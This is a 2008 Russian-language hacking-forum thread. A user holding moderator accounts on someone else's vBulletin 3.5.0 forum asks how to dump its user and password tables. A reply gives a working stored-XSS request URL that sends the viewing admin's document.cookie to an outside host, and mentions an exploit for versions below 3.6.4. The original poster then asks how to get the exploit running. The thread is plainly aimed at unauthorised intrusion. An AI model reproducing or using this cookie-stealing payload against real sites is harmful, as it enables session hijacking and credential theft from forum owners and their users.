ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Vbulletin 3.5.0 + аккаунты модераторов = ?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Vbulletin 3.5.0 + аккаунты модераторов = ?
  #1  
Старый 27.05.2008, 11:54
Аватар для Minsor
Minsor
Новичок
Регистрация: 28.02.2007
Сообщений: 20
Провел на форуме:
178079

Репутация: 66
Question Vbulletin 3.5.0 + аккаунты модераторов = ?
Здравствуйте, господа хорошие.

Вот есть форум на Vbulletin 3.5.0, есть два работающих аккаунта модераторов - что с этим можно сделать в плане добычи таблиц типа user; pass и т.п.?

P.S. Профиль не мой, но заначку терять нет желания, так что если кто чем поможет - с меня причитается.
 
Ответить с цитированием

  #2  
Старый 27.05.2008, 13:36
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию
емть эксплойт для версий ниже 3.6.4, там как раз нужны привелигии модеров.
ссылко
или еще, как вариант, от имени модера попробывать отправить админа на хсс
Код:
www.xz.сom/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%  E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0
Последний раз редактировалось maxster; 27.05.2008 в 13:40..
 
Ответить с цитированием

  #3  
Старый 27.05.2008, 14:27
Аватар для Minsor
Minsor
Новичок
Регистрация: 28.02.2007
Сообщений: 20
Провел на форуме:
178079

Репутация: 66
По умолчанию
Сенкс за эксплойт, но я не врубаюсь как он работает: заполняю все нужные поля типа host, path, user и т.д., запускаю и появляется пустая страница. (На моем хостинге пхп работает и другие сплоиты отрабатывают).

Кто работал с этим эксплоитом - объясните в чем суть и как правильно делать. Сенкс.
 
Ответить с цитированием

  #4  
Старый 27.05.2008, 20:33
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию
Почитай поймешь как запускать

клацк
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите найти скрипт N19hTW0lF PHP, PERL, MySQL, JavaScript 7 31.03.2008 23:26
Уязвимость в Vbulletin 3.5.0 ПушОК Форумы 1 09.02.2006 21:01
Html_Injection in vBulletin 3.5.2 max_pain89 Форумы 16 08.01.2006 17:23
Есть ли XSS на vBulletin 3.5.0? Unnamed Форумы 4 17.12.2005 17:21
Уязвимость в vBulletin 3.5.0 Имба Форумы 0 20.11.2005 03:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ